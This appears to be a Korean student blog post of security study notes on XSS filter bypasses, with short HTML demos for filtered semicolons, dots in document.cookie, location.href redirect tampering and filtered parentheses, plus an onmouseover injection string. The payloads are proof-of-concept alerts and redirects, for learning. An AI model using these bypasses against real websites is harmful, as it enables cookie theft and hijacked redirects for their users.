[ Web Hacking ] - XSS Bypass — 현서의 개발 일지📚

1. 세미콜론(;)이 필터링될 때

 <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
    <script>
       var a = 'a'-alert(1);
    </script>
 
</body>
</html>

 <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
    <script>
       alert(document['cookie']);
    </script>
 
</body>
</html>

3. location.href로 이동되는 값을 임의로 변조할 때

 <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
    <script>
       location.href='https://naver.com' && 'https://daum.net';
    </script>
 
</body>
</html>

또한 -를 이용해 alert함수 실행 후 ^1&&을 통해 리다이렉트 가능

 <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
    <script>
       location.href='https://naver.com'
       -alert(1)^1&&'https://daum.net';
    </script>
 
</body>
</html>

4. ()괄호를 필터링할 경우 (백틱)사용

 <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
    <script>
       alert`XSS`
    </script>
 
</body>
</html>

저작자표시 비영리 동일조건

'School > Security' 카테고리의 다른 글

[ Reverse Engineering ] - ABOUT (0)	2022.05.28
[ Web Hacking ] - CSRF (0)	2022.05.28
[ Web Hacking ] - XSS (0)	2022.05.27
[ Web Hacking ] - Mitigation: Same Origin Policy (0)	2022.05.27
[ Web Hacking ] - Cookie & Session (0)	2022.05.26

1. 세미콜론(;)이 필터링될 때
2. document.cookie에서 .가 필터링될떄
3. location.href로 이동되는 값을 임의로 변조할 때
4. ()괄호를 필터링할 경우 (백틱)사용

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

[ Web Hacking ] - XSS Bypass

1. 세미콜론(;)이 필터링될 때

3. location.href로 이동되는 값을 임의로 변조할 때

4. ()괄호를 필터링할 경우 (백틱)사용

'School > Security' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

	<!DOCTYPE html>
	<html lang="en">
	<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Document</title>
	</head>
	<body>
	<!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
	<script>
	var a = 'a'-alert(1);
	</script>

	</body>
	</html>

1. 세미콜론(;)이 필터링될 때

2. document.cookie에서 .가 필터링될떄

3. location.href로 이동되는 값을 임의로 변조할 때

4. ()괄호를 필터링할 경우 (백틱)사용

'School > Security' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역